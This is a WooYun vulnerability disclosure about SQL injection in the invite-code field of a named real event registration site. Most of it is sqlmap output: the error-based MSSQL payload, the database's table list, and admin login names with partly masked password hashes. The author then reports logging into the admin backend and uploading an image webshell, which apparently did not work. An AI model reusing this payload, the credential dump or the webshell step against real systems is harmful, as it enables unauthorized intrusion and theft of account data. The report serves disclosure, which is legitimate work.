WooYun.org

http://events.sflep.com/mt/index.aspx
邀请码输入框存在注入。
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtMICode (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=button1&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4MTI0
ODQ5MmRk2ysOwk5FkNBxGCZZ/KHzAx3O4uBL9M/gNqY6hJiJojI=&__EVENTVALIDATION=/wEdAAMz7
G3sG1QTdCAO6JI8QGzvhr8PpKSDDfMwV8N40xYy57H1uWQrHqYRgG5PSRJ1ZecpgyJ79/KMk9Kz0rG77
CBaadhMTn4z5ip+1vIcwNJH4A==&txtMICode=a' AND 6427=CONVERT(INT,(SELECT CHAR(113)+
CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6427=6427) THEN CHAR
(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(118)+CHAR(113))) AND
'VCIM'='VCIM
---
[14:11:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET, Nginx
back-end DBMS: Microsoft SQL Server 2000
current database: 'events'
Database: events
[13 tables]
+--------------------------------------------+
| Admins |
| BigColumns |
| Meetings |
| PointsBBS |
| RegInfo |
| RegTemplate |
| S_City |
| S_District |
| S_Province |
| SmallColumns |
| dtproperties |
| sysconstraints |
| syssegments |
+--------------------------------------------+
+----------------+----------------------------------+
| LoginName | LoginPassword |
+----------------+----------------------------------+
| admin | 6ACFA7AD8BC2088--FA0--F0934EAE2F |
| xxxxxx | E3CEB5881A0A1FD--D0--96D7554868D |
| xxxxxxxxx | 96E79218965EB72C--A==9DD5A330112 |
| xxx | 4CA7C2F1A2B2BC1--25--60506784A90 |
得到账号密码，进入后台

ii7.0，上传了图片马，看存不存解析漏洞，没有访问成功，别的未测试。